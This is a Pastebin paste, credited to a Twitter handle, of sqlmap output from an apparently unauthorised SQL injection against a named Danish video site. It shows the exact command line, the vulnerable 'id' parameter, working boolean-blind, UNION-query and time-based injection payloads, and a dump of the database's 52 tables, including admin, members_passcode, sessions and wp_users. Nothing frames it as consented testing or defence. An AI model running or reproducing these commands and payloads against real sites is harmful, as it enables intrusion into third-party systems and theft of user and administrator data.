Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- By @JM511 <Twitter
- ===========================
- http://video7.lolvideo.dk/
- [03:28:58] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.3.19
- back-end DBMS: MySQL 5.0.11
- [03:28:58] [INFO] fetching database names
- available databases [2]:
- [*] information_schema
- [*] lolvideo_dk_db
- [03:28:59] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.video7.lolvideo.dk'
- [*] shutting down at 03:28:59
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.video7.lolvideo.dk/game.php?id=298 -D lolvideo_dk_db --tables
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 03:29:08
- [03:29:08] [INFO] resuming back-end DBMS 'mysql'
- [03:29:09] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=298 AND 9048=9048
- Type: UNION query
- Title: MySQL UNION query (NULL) - 17 columns
- Payload: id=298 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6e70713a,0x684c6d416464504c7472,0x3a686d713a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id=298 AND SLEEP(5)
- ---
- [03:29:10] [INFO] the back-end DBMS is MySQL
- web application technology: Apache, PHP 5.3.19
- back-end DBMS: MySQL 5.0.11
- [03:29:10] [INFO] fetching tables for database: 'lolvideo_dk_db'
- Database: lolvideo_dk_db
- [52 tables]
- +------------------------------+
- | admin |
- | admin0 |
- | admin9 |
- | administrators |
- | adminlol |
- | adminlolz |
- | advertisements |
- | babes |
- | babeslolz |
- | bans_ips |
- | billederlolz |
- | config |
- | game_categories |
- | games |
- | gameslolz |
- | goviral |
- | image_categories |
- | images |
- | members |
- | members_passcode |
- | members_verifycode |
- | pictures_flashfiles_upload |
- | posts |
- | posts_favorited |
- | posts_reports |
- | posts_unfavorited |
- | sessions |
- | settings |
- | settings9 |
- | static |
- | talks |
- | unapproved_videos |
- | videoer |
- | videoer0 |
- | videoer11 |
- | videoer9 |
- | videoerNO |
- | videoerlolz |
- | videos_pictures_flash_likes |
- | videos_pictures_flash_rating |
- | wp_commentmeta |
- | wp_comments |
- | wp_links |
- | wp_options |
- | wp_postmeta |
- | wp_posts |
- | wp_sharebar |
- | wp_term_relationships |
- | wp_term_taxonomy |
- | wp_terms |
- | wp_usermeta |
- | wp_users |
- +------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement